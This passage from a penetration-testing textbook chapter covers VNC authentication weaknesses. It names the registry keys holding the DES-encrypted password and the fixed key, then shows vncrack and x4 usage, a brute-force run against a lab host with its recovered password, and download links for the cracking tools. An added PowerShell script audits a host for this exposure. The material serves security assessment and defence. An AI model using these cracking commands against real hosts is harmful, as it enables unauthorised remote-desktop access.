7.7 VNC

AT&T's Virtual Network Computing (VNC) package is available from http://www.uk.research.att.com/vnc/. VNC is a free and simple remote desktop access system for Windows, and it runs over the following TCP ports:

  • Port 5800 for HTTP access to VNC using a Java client through a web browser

  • Port 5900 for direct access to VNC using the native vncviewer.exe

From a security perspective, VNC is relatively straightforward to compromise. A major issue with VNC security is its authentication mechanism, shown in Figure 7-3.

Figure 7-3. VNC authentication relies on a single password

VNC requires only one piece of data for authentication purposes: a session password with a maximum length of eight characters. On the target server, the VNC password string is stored in the Windows registry under the following keys:

\HKEY_CURRENT_USER\Software\ORL\WinVNC3

\HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3

The VNC password is encrypted with DES under a fixed key, so an attacker who gains read access to the system registry across the network (often possible on poorly protected Windows hosts) can recover the VNC session password. The fixed key is found in the VNC source code (0x238210763578887 at the time of writing).
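As an added defensive check (not part of the book's text or the Phenoelit tools), the following PowerShell script audits a Windows host for the weakness just described: it looks for the WinVNC3 registry keys named above, reports whether a stored Password value is present, lists any principal outside an assumed trusted set that can read the key, and notes whether the Remote Registry service (the over-the-network read path) is running and whether anything listens on 5800/5900. The trusted-principal list and the use of Get-NetTCPConnection (Windows 8/Server 2012 and later) are assumptions.

```powershell
# Added example, not from the book: audit the registry storage of the WinVNC3 password.
$keys = @(
    'Registry::HKEY_CURRENT_USER\Software\ORL\WinVNC3',
    'Registry::HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3'
)
# Assumed set of principals for whom read access is expected; anything else is flagged.
$trusted = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'CREATOR OWNER')

foreach ($key in $keys) {
    if (-not (Test-Path $key)) { continue }
    $item = Get-Item $key
    $hasPassword = $null -ne $item.GetValue('Password')
    Write-Output "$key : stored Password value present = $hasPassword"

    # QueryValues alone is enough to read the encrypted password blob, so test for that bit.
    $readMask = [System.Security.AccessControl.RegistryRights]::QueryValues
    foreach ($ace in (Get-Acl $key).Access) {
        $grantsRead = ($ace.AccessControlType -eq 'Allow') -and
                      (($ace.RegistryRights -band $readMask) -ne 0)
        if ($grantsRead -and ($trusted -notcontains $ace.IdentityReference.Value)) {
            Write-Output "  REVIEW: $($ace.IdentityReference) can read this key ($($ace.RegistryRights))"
        }
    }
}

# The registry is reachable across the network only while Remote Registry is running.
$rr = Get-Service -Name RemoteRegistry -ErrorAction SilentlyContinue
if ($rr -and $rr.Status -eq 'Running') {
    Write-Output 'REVIEW: Remote Registry service is running; the key is readable remotely by anyone the ACL admits.'
}

# Report VNC-style listeners on the two ports the text describes.
Get-NetTCPConnection -State Listen -ErrorAction SilentlyContinue |
    Where-Object { $_.LocalPort -in 5800, 5900 } |
    ForEach-Object { Write-Output "VNC listener: $($_.LocalAddress):$($_.LocalPort)" }
```

Run it in an elevated session so the HKEY_USERS\.DEFAULT hive and the ACLs are readable; a flagged ACE or a running Remote Registry service with a stored password present is the exposure the text describes.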

7.7.1 VNC Brute-Force Password Grinding

vncrack by FX of Phenoelit is a Unix-based VNC cracking utility that's available from http://www.phenoelit.de/vncrack/. You can use vncrack to perform decryption of the VNC session password retrieved from the system registry, as well as active brute force against the VNC service over a network.

The VNC authentication handshake can also be sniffed and the session password compromised using the Unix-based phoss network sniffing utility, available from Phenoelit at http://www.phenoelit.de/phoss/.

Example 7-17 shows the usage of the Unix-based vncrack utility.

Example 7-17. Using vncrack
# ./vncrack
VNCrack
$Id: ch07.xml,v 1.4 2004/04/02 23:01:01 chodacki Exp $
by Phenoelit (http://www.phenoelit.de/)

Usage:
Online: ./vncrack -h target.host.com -w wordlist.txt [-opt's]
Passwd: ./vncrack -C /home/some/user/.vnc/passwd
Windows interactive mode: ./vncrack -W
        enter hex key one byte per line - find it in
        \HKEY_CURRENT_USER\Software\ORL\WinVNC3\Password or
        \HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3\Password

Options for online mode:
-v      verbose
-d N    Sleep N nanoseconds between each try
-D N    Sleep N seconds between each try
-a      Just a funny thing
-p P    connect to port P instead of 5900
-s N    Sleep N seconds in case connect( ) failed
Options for PHoss intercepted challenges:
-c <challenge>  challenge from PHoss output
-r <response>   response from PHoss output

By supplying the challenge and response captured by phoss, the tool can also instantly compromise sniffed session passwords. Example 7-18 shows that the VNC session password for 192.168.189.120 is control, recovered after launching a brute-force attack.

Example 7-18. Brute-forcing the VNC password with vncrack
# ./vncrack -h 192.168.189.120 -w common.txt
VNCrack - by Phenoelit (http://www.phenoelit.de/)
$Revision: 1.4 $
Server told me: connection close
Server told me: connection close

>>>>>>>>>>>>>>>
Password: control
>>>>>>>>>>>>>>>

The vncrack tool has also been ported and compiled for Win32 environments under the name x4. Example 7-19 shows the x4 command-line options.

Example 7-19. The Win32 port of vncrack, x4
D:\phenoelit> x4
VNCrackX4
by Phenoelit (http://www.phenoelit.de/)

Usage:
Online: ./vncrack -h target.host.com -w wordlist.txt [-opt's]
Windows interactive mode: ./vncrack -W
        enter hex key one byte per line - find it in
        \HKEY_CURRENT_USER\Software\ORL\WinVNC3\Password or
        \HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3\Password

Options for online mode:
-v      verbose (repeat -v for more)
-p P    connect to port P instead of 5900
Options for PHoss intercepted challages:
-c <challange>  challange from PHoss output
-r <response>   response from PHoss output

If the Phenoelit site is down or no longer archives these tools, they are available at the following locations:

http://examples.oreilly.com/networksa/tools/vncrack_src.tar.gz
http://examples.oreilly.com/networksa/tools/x4.exe
